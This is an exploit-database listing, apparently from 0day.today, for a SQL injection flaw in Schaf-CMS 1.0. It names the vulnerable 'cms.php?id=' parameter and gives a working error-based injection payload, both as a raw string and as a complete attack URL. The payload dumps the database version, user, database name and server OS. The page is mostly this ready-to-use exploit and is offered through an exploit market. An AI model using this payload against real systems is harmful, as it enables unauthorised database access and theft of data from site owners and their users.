[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Schaf-CMS 1.0 SQL Injection Vulnerability

Author
Manas58
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12377
Category
web applications
Date add
24-05-2010
Platform
php
=========================================
Schaf-CMS 1.0 SQL Injection Vulnerability
=========================================


########################### 
       
Author    : Manas58  
Homepage  : http://www.1923turk.com     
Script    : Schaf-CMS 1.0 
Download  : http://www.brothersoft.com/site-builder-software---cms-53489.html
       
###########################   
         
[ Vulnerable File ] 
     
cms.php?id= [ SQL ] 
          
     
[ XpL ] 
       
+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+
     
     
http://server/cms.php?id=5+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+     



#  0day.today [2024-12-27]  #